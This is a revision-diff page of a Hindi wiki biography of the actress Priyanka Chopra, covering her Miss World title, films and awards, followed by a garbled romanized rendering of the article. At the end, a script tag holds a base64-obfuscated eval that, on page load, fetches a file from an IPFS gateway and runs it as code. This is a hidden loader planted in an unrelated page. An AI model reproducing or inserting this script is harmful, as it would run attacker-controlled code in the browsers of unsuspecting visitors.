Difference between revisions of "प्रियंका चोपड़ा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{सूचना बक्सा कलाकार |चित्र=Priyanka-Chopra-1.jpg |चित्र का नाम=प...' के साथ नया पृष्ठ बनाया)
 
Line 12: Line 12:
 
|पति/पत्नी=
 
|पति/पत्नी=
 
|संतान=
 
|संतान=
|कर्म भूमि=
+
|कर्म भूमि=[[भारत]]
|कर्म-क्षेत्र=[[अभिनेत्री]]
+
|कर्म-क्षेत्र=[[हिन्दी सिनेमा]]
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
|मुख्य फ़िल्में=बिग ब्रदर, लंदन ड्रीम्स, गॉड तुस्सी ग्रेट हो, फैशन, सात खून माफ, बर्फी, क्रिश 3  
+
|मुख्य फ़िल्में='बिग ब्रदर', 'लंदन ड्रीम्स', 'गॉड तुस्सी ग्रेट हो', 'फैशन', 'सात खून माफ', 'बर्फी' तथा 'क्रिश 3' आदि।
 
|विषय=
 
|विषय=
 
|शिक्षा=
 
|शिक्षा=
|विद्यालय=ला मरटीनियर गर्ल्स कॉलेज ([[लखनऊ]])
+
|विद्यालय='लॉ मरटीनियर गर्ल्स कॉलेज', [[लखनऊ]]
|पुरस्कार-उपाधि=सर्वश्रेष्ट अभिनेत्री के लिए राष्ट्रीय फिल्म अवार्ड, फ़िल्मफेयर बेस्ट फीमेल डेब्यू अवार्ड मिला।
+
|पुरस्कार-उपाधि='मिस वर्ल्ड का खिताब' ([[2000]]), फ़िल्म 'अंदाज' के लिए 'फ़िल्मफेयर बेस्ट फीमेल डेब्यू अवॉर्ड', फ़िल्म 'ऐतराज' के लिए के लिए 'फ़िल्मफेयर बेस्ट फीमेल विलेन अवॉर्ड' आदि।
|प्रसिद्धि=
+
|प्रसिद्धि=बॉलिवुड अभिनेत्री
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय  
 
|नागरिकता=भारतीय  
Line 28: Line 28:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=फेमिना मिस इंडिया में दूसरा पायदान हासिल करने के बाद उसी साल 'मिस वर्ल्ड 2000' की विजेता रहीं।
+
|अन्य जानकारी='फेमिना मिस इंडिया' में दूसरा पायदान हासिल करने के बाद उसी साल प्रियंका चोपड़ा 'मिस वर्ल्ड 2000' की विजेता रहीं।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
 
 
'''प्रियंका चोपड़ा''' ([[अंग्रेज़ी]]: ''Priyanka Chopra'', जन्म- [[18 जुलाई]], [[1982]], [[जमशेदपुर]], [[झारखण्ड]]) [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेत्रियों में से एक हैं, जिनमें अभिनय का अनूठा संगम देखने को मिलता है। उन्होंने एक सर्वश्रेष्ठ [[अभिनेत्री]] का राष्ट्रीय फ़िल्म पुरस्कार और चार श्रेणियों में फ़िल्मफेयर पुरस्कार सहित कई और अन्य पुरस्कार और नामांकन प्राप्त किये है। वे 'मिस वर्ल्ड 2000' की विजेता भी रहीं। इस सम्मान को प्राप्त करने वाली वह पाँचवीं भारतीय महिला हैं।
 
'''प्रियंका चोपड़ा''' ([[अंग्रेज़ी]]: ''Priyanka Chopra'', जन्म- [[18 जुलाई]], [[1982]], [[जमशेदपुर]], [[झारखण्ड]]) [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेत्रियों में से एक हैं, जिनमें अभिनय का अनूठा संगम देखने को मिलता है। उन्होंने एक सर्वश्रेष्ठ [[अभिनेत्री]] का राष्ट्रीय फ़िल्म पुरस्कार और चार श्रेणियों में फ़िल्मफेयर पुरस्कार सहित कई और अन्य पुरस्कार और नामांकन प्राप्त किये है। वे 'मिस वर्ल्ड 2000' की विजेता भी रहीं। इस सम्मान को प्राप्त करने वाली वह पाँचवीं भारतीय महिला हैं।
 
==जीवन परिचय==
 
==जीवन परिचय==
 
प्रियंका चोपड़ा का जन्म 18 जुलाई, 1982 को झारखंड राज्य के जमशेदपुर में हुआ था। उनके [[पिता]] अशोक चोपड़ा और [[मां]] मधु दोनों भारतीय आर्मी में चिकित्‍सक है। उनका एक छोटा भाई भी है जिसका नाम सिद्धार्थ है। प्रियंका का बचपन कई शहरों में बीता। इनकी प्रारंभिक शिक्षा [[लखनऊ]], [[उत्तर प्रदेश]] के 'ला मरटीनियर गर्ल्स कॉलेज'<ref>La Martiniere Girls’ School</ref> से पूरी हुई। प्रारंभिक शिक्षा पूर्ण होने के बाद उन्होंने [[मुंबई]] के 'जय हिंद कॉलेज'<ref>Jai Hind College in Mumbai</ref> में पढ़ाई की। मिस वर्ल्ड का खिताब जीतने के बाद उन्होंने कॉलेज बीच में ही छोड़ दिया।
 
प्रियंका चोपड़ा का जन्म 18 जुलाई, 1982 को झारखंड राज्य के जमशेदपुर में हुआ था। उनके [[पिता]] अशोक चोपड़ा और [[मां]] मधु दोनों भारतीय आर्मी में चिकित्‍सक है। उनका एक छोटा भाई भी है जिसका नाम सिद्धार्थ है। प्रियंका का बचपन कई शहरों में बीता। इनकी प्रारंभिक शिक्षा [[लखनऊ]], [[उत्तर प्रदेश]] के 'ला मरटीनियर गर्ल्स कॉलेज'<ref>La Martiniere Girls’ School</ref> से पूरी हुई। प्रारंभिक शिक्षा पूर्ण होने के बाद उन्होंने [[मुंबई]] के 'जय हिंद कॉलेज'<ref>Jai Hind College in Mumbai</ref> में पढ़ाई की। मिस वर्ल्ड का खिताब जीतने के बाद उन्होंने कॉलेज बीच में ही छोड़ दिया।
===='''मिस वर्ल्ड का सफर'''====
+
====मिस वर्ल्ड का सफर====
 
प्रियंका चोपड़ा की मां ने उनकी कुछ फोटो मिस इंडिया प्रतियोगिता के लिए भेज दी और उसके बाद प्रियंका को शो में भाग लेने का मौका भी मिला। यह सब प्रियंका के लिए बड़ा आश्चर्यजनक था। अपनी पढ़ाई से समय निकालकर उन्होंने प्रतियोगिता में हिस्सा लिया। वर्ष 2000 में उन्होंने फेमिना मिस इंडिया<ref>Femina Miss India 2000</ref> में दूसरा पायदान हासिल किया। दूसरे स्थान के लिए प्रियंका चोपड़ा को ‘मिस इंडिया वर्ल्‍ड’ का ताज पहनाया गया। फिर इन्होनें ‘मिस वर्ल्‍ड’ प्रतियोगिता में भारत का प्रतिनिधित्‍व कर ‘मिस वर्ल्‍ड-2000’<ref>Miss World 2000</ref> का खिताब जीता। वर्ष 2009 में उन्हें मिस वर्ल्ड के लिए जज के तौर पर बुलाया गया था।
 
प्रियंका चोपड़ा की मां ने उनकी कुछ फोटो मिस इंडिया प्रतियोगिता के लिए भेज दी और उसके बाद प्रियंका को शो में भाग लेने का मौका भी मिला। यह सब प्रियंका के लिए बड़ा आश्चर्यजनक था। अपनी पढ़ाई से समय निकालकर उन्होंने प्रतियोगिता में हिस्सा लिया। वर्ष 2000 में उन्होंने फेमिना मिस इंडिया<ref>Femina Miss India 2000</ref> में दूसरा पायदान हासिल किया। दूसरे स्थान के लिए प्रियंका चोपड़ा को ‘मिस इंडिया वर्ल्‍ड’ का ताज पहनाया गया। फिर इन्होनें ‘मिस वर्ल्‍ड’ प्रतियोगिता में भारत का प्रतिनिधित्‍व कर ‘मिस वर्ल्‍ड-2000’<ref>Miss World 2000</ref> का खिताब जीता। वर्ष 2009 में उन्हें मिस वर्ल्ड के लिए जज के तौर पर बुलाया गया था।
===='''फ़िल्मी सफ़र'''====  
+
====फ़िल्मी सफ़र====  
 
वर्ष 2002 में प्रियंका चोपड़ा ने अपने सिने कैरियर की शुरुआत तमिल फ़िल्म ‘थमिज़न’ से की। इनकी पहली हिन्दी फ़िल्म "द हीरो" थी। उन्हें फ़िल्म “अदांज” के लिए पहला फ़िल्मफेयर अवार्ड मिला था। अंदाज के लिए उन्हें फिल्‍मफेयर नवोदित अभिनेत्री’ का भी पुरस्कार दिया गया था। इसके बाद उनकी काफी फ़िल्में आईं लेकिन बॉक्स ऑफिस पर कोई खास छाप नहीं छोड़ सकीं। लेकिन असफलता के इस दौर में भी उन्होंने मेहनत से मुंह नहीं मोड़ा और जल्द ही परिणाम देखने को भी मिला। डेविड धवन की फ़िल्म “मुझसे शादी करोगी” के साथ प्रियंका की सफलता की गाड़ी फिर चल पड़ी। इसके बाद आई फ़िल्म “ऐतराज़” के लिए उन्हें फ़िल्मफेयर बेस्ट फीमेल विलेन का अवार्ड भी मिला।
 
वर्ष 2002 में प्रियंका चोपड़ा ने अपने सिने कैरियर की शुरुआत तमिल फ़िल्म ‘थमिज़न’ से की। इनकी पहली हिन्दी फ़िल्म "द हीरो" थी। उन्हें फ़िल्म “अदांज” के लिए पहला फ़िल्मफेयर अवार्ड मिला था। अंदाज के लिए उन्हें फिल्‍मफेयर नवोदित अभिनेत्री’ का भी पुरस्कार दिया गया था। इसके बाद उनकी काफी फ़िल्में आईं लेकिन बॉक्स ऑफिस पर कोई खास छाप नहीं छोड़ सकीं। लेकिन असफलता के इस दौर में भी उन्होंने मेहनत से मुंह नहीं मोड़ा और जल्द ही परिणाम देखने को भी मिला। डेविड धवन की फ़िल्म “मुझसे शादी करोगी” के साथ प्रियंका की सफलता की गाड़ी फिर चल पड़ी। इसके बाद आई फ़िल्म “ऐतराज़” के लिए उन्हें फ़िल्मफेयर बेस्ट फीमेल विलेन का अवार्ड भी मिला।
  
Line 45: Line 43:
  
 
2011 में आई फ़िल्म “सात खून माफ” यूं तो बॉक्स ऑफिस पर ज्यादा नहीं चली पर इस फ़िल्म में प्रियंका चोपड़ा ने जिस तरह की अदाकारी की उसने सबका मन मोह लिया। 2012 में आयी बर्फी जैसी फ़िल्मों में अभिनय से आगे व्यावसायिक सफलता हासिल की! और सुपरहीरो विज्ञान कथा फ़िल्म क्रिश 3 (2013), जो सबसे अधिक कमाई करने वाली भारतीय फ़िल्मों के बीच रैंक हासिल की।
 
2011 में आई फ़िल्म “सात खून माफ” यूं तो बॉक्स ऑफिस पर ज्यादा नहीं चली पर इस फ़िल्म में प्रियंका चोपड़ा ने जिस तरह की अदाकारी की उसने सबका मन मोह लिया। 2012 में आयी बर्फी जैसी फ़िल्मों में अभिनय से आगे व्यावसायिक सफलता हासिल की! और सुपरहीरो विज्ञान कथा फ़िल्म क्रिश 3 (2013), जो सबसे अधिक कमाई करने वाली भारतीय फ़िल्मों के बीच रैंक हासिल की।
===='''सम्मान और पुरस्कार'''====
+
====सम्मान और पुरस्कार====
#मिस वर्ल्ड 2000 : वर्ष 2000 में प्रियंका चोपड़ा ने मिस वर्ल्ड का खिताब जीता।
+
अपने सिने कॅरियर में प्रियंका चोपड़ा ने कई पुरस्कार व सम्मान प्राप्त किये हैं, जैसे-
#फ़िल्म “अंदाज” के लिए प्रियंका चोपड़ा को फ़िल्मफेयर बेस्ट फीमेल डेब्यू अवार्ड।
+
#वर्ष 2000 में प्रियंका चोपड़ा ने 'मिस वर्ल्ड का खिताब' जीता।
#फ़िल्मफेयर बेस्ट फीमेल Debut का पुरस्कार मिला।<ref>Filmfare Best Female Debut Award</ref>
+
#फ़िल्म “अंदाज” के लिए प्रियंका चोपड़ा को 'फ़िल्मफेयर बेस्ट फीमेल डेब्यू अवार्ड' से नवाजा गया।
#फ़िल्म “एतराज” के लिए प्रियंका चोपड़ा को फ़िल्मफेयर बेस्ट फीमेल विलेन<ref>Filmfare Best Female Villain Award</ref> का अवार्ड मिला।
+
#'फ़िल्मफेयर बेस्ट फीमेल डेव्यूट' का पुरस्कार मिला।<ref>Filmfare Best Female Debut Award</ref>
#फ़िल्म “फैशन” के लिए प्रियंका चोपड़ा को सर्वश्रेष्ट अभिनेत्री का राष्ट्रीय पुरस्कार
+
#फ़िल्म “एतराज” के लिए 'फ़िल्मफेयर बेस्ट फीमेल विलेन'<ref>Filmfare Best Female Villain Award</ref> का अवार्ड मिला।
#सर्वश्रेष्ट अभिनेत्री के लिए राष्ट्रीय फ़िल्म अवार्ड मिला<ref>National Film Award for Best Actress</ref>
+
#फ़िल्म “फैशन” के लिए प्रियंका चोपड़ा को सर्वश्रेष्ट अभिनेत्री का 'राष्ट्रीय पुरस्कार' प्रदान किया गया।
 +
#सर्वश्रेष्ट अभिनेत्री के लिए 'राष्ट्रीय फ़िल्म पुरस्कार' मिला<ref>National Film Award for Best Actress</ref>
 
===='''छोटे पर्दे पर सक्रियता'''====
 
===='''छोटे पर्दे पर सक्रियता'''====
 
प्रियंका चोपड़ा फ़िल्मों के साथ-साथ छोटे पर्दे पर भी सक्रिय हैं। टीवी शो ‘खतरों के खिलाड़ी लेवल 3’ की वह होस्ट रह चुकी हैं। अपने ग्लैमरस अंदाज और शरारती मुस्कराहट की वजह से वह फ़िल्मकारों की पंसदीदा बन चुकी हैं। एक छोटे से शहर से [[बॉलीवुड]] के आकाश तक की इस कहानी में कई मोड़ आए पर प्रियंका ने हर मुसीबत का सामना कर सफलता की तरफ कदम बढ़ाए।
 
प्रियंका चोपड़ा फ़िल्मों के साथ-साथ छोटे पर्दे पर भी सक्रिय हैं। टीवी शो ‘खतरों के खिलाड़ी लेवल 3’ की वह होस्ट रह चुकी हैं। अपने ग्लैमरस अंदाज और शरारती मुस्कराहट की वजह से वह फ़िल्मकारों की पंसदीदा बन चुकी हैं। एक छोटे से शहर से [[बॉलीवुड]] के आकाश तक की इस कहानी में कई मोड़ आए पर प्रियंका ने हर मुसीबत का सामना कर सफलता की तरफ कदम बढ़ाए।

Revision as of 07:45, 1 May 2016

priyanka chop da
poora nam priyanka chop da
prasiddh nam priyanka chop da
any nam pigi ch aaup
janm 18 julaee, 1982
janm bhoomi jamashedapur, jharakhand
abhibhavak ashok chop da aur madhu chop da
karm bhoomi bharat
karm-kshetr hindi sinema
mukhy filmean 'big bradar', 'landan drims', 'g aaud tussi gret ho', 'phaishan', 'sat khoon maph', 'barphi' tatha 'krish 3' adi.
vidyalay 'l aau maratiniyar garls k aaulej', lakhanoo
puraskar-upadhi 'mis varld ka khitab' (2000), film 'aandaj' ke lie 'filmapheyar best phimel debyoo av aaurd', film 'aitaraj' ke lie ke lie 'filmapheyar best phimel vilen av aaurd' adi.
prasiddhi b aaulivud abhinetri
nagarikata bharatiy
any janakari 'phemina mis iandiya' mean doosara payadan hasil karane ke bad usi sal priyanka chop da 'mis varld 2000' ki vijeta rahian.

priyanka chop da (aangrezi: Priyanka Chopra, janm- 18 julaee, 1982, jamashedapur, jharakhand) hindi filmoan ki prasiddh abhinetriyoan mean se ek haian, jinamean abhinay ka anootha sangam dekhane ko milata hai. unhoanne ek sarvashreshth abhinetri ka rashtriy film puraskar aur char shreniyoan mean filmapheyar puraskar sahit kee aur any puraskar aur namaankan prapt kiye hai. ve 'mis varld 2000' ki vijeta bhi rahian. is samman ko prapt karane vali vah paanchavian bharatiy mahila haian.

jivan parichay

priyanka chop da ka janm 18 julaee, 1982 ko jharakhand rajy ke jamashedapur mean hua tha. unake pita ashok chop da aur maan madhu donoan bharatiy armi mean chikith‍sak hai. unaka ek chhota bhaee bhi hai jisaka nam siddharth hai. priyanka ka bachapan kee shaharoan mean bita. inaki praranbhik shiksha lakhanoo, uttar pradesh ke 'la maratiniyar garls k aaulej'[1] se poori huee. praranbhik shiksha poorn hone ke bad unhoanne muanbee ke 'jay hiand k aaulej'[2] mean padhaee ki. mis varld ka khitab jitane ke bad unhoanne k aaulej bich mean hi chho d diya.

mis varld ka saphar

priyanka chop da ki maan ne unaki kuchh photo mis iandiya pratiyogita ke lie bhej di aur usake bad priyanka ko sho mean bhag lene ka mauka bhi mila. yah sab priyanka ke lie b da ashcharyajanak tha. apani padhaee se samay nikalakar unhoanne pratiyogita mean hissa liya. varsh 2000 mean unhoanne phemina mis iandiya[3] mean doosara payadan hasil kiya. doosare sthan ke lie priyanka chop da ko ‘mis iandiya varlh‍d’ ka taj pahanaya gaya. phir inhonean ‘mis varlh‍d’ pratiyogita mean bharat ka pratinidhith‍v kar ‘mis varlh‍d-2000’[4] ka khitab jita. varsh 2009 mean unhean mis varld ke lie jaj ke taur par bulaya gaya tha.

filmi safar

varsh 2002 mean priyanka chop da ne apane sine kairiyar ki shuruat tamil film ‘thamizan’ se ki. inaki pahali hindi film "d hiro" thi. unhean film “adaanj” ke lie pahala filmapheyar avard mila tha. aandaj ke lie unhean philh‍mapheyar navodit abhinetri’ ka bhi puraskar diya gaya tha. isake bad unaki kaphi filmean aeean lekin b aauks aauphis par koee khas chhap nahian chho d sakian. lekin asaphalata ke is daur mean bhi unhoanne mehanat se muanh nahian mo da aur jald hi parinam dekhane ko bhi mila. devid dhavan ki film “mujhase shadi karogi” ke sath priyanka ki saphalata ki ga di phir chal p di. isake bad aee film “aitaraz” ke lie unhean filmapheyar best phimel vilen ka avard bhi mila.

varsh 2008 mean unaki chhah filmean aeean jinamean se shuruati paanch to phl aaup sabit hueean lekin chhathi film madhur bhandarakar ki “phaishan” ne ek bar phir priyanka ke saphar mean tarnig pvaiant ki tarah kam kiya. “phaishan” ne priyanka chop da ke kॅriyar ko nee rah dikhaee. kal tak ek nee hiroin ka tamanga sanbhale priyanka “phaishan” ke bad b aaulivud ki saphal hiroinoan mean gini jane lagian. “phaishan” ke lie unhean filmapheyar best hiroin ka avard bhi mila. “dostana” mean bhi unaka abhinay kabiletariph tha. film “kamine” mean bhi priyanka ke abhinay ki sabane sarahana ki.

2011 mean aee film “sat khoon maph” yooan to b aauks aauphis par jyada nahian chali par is film mean priyanka chop da ne jis tarah ki adakari ki usane sabaka man moh liya. 2012 mean ayi barphi jaisi filmoan mean abhinay se age vyavasayik saphalata hasil ki! aur suparahiro vijnan katha film krish 3 (2013), jo sabase adhik kamaee karane vali bharatiy filmoan ke bich raiank hasil ki.

samman aur puraskar

apane sine kॅriyar mean priyanka chop da ne kee puraskar v samman prapt kiye haian, jaise-

  1. varsh 2000 mean priyanka chop da ne 'mis varld ka khitab' jita.
  2. film “aandaj” ke lie priyanka chop da ko 'filmapheyar best phimel debyoo avard' se navaja gaya.
  3. 'filmapheyar best phimel devyoot' ka puraskar mila.[5]
  4. film “etaraj” ke lie 'filmapheyar best phimel vilen'[6] ka avard mila.
  5. film “phaishan” ke lie priyanka chop da ko sarvashresht abhinetri ka 'rashtriy puraskar' pradan kiya gaya.
  6. sarvashresht abhinetri ke lie 'rashtriy film puraskar' mila[7]

chhote parde par sakriyata

priyanka chop da filmoan ke sath-sath chhote parde par bhi sakriy haian. tivi sho ‘khataroan ke khila di leval 3’ ki vah host rah chuki haian. apane glaimaras aandaj aur shararati muskarahat ki vajah se vah filmakaroan ki pansadida ban chuki haian. ek chhote se shahar se b aaulivud ke akash tak ki is kahani mean kee mo d ae par priyanka ne har musibat ka samana kar saphalata ki taraph kadam badhae.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. La Martiniere Girls’ School
  2. Jai Hind College in Mumbai
  3. Femina Miss India 2000
  4. Miss World 2000
  5. Filmfare Best Female Debut Award
  6. Filmfare Best Female Villain Award
  7. National Film Award for Best Actress

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>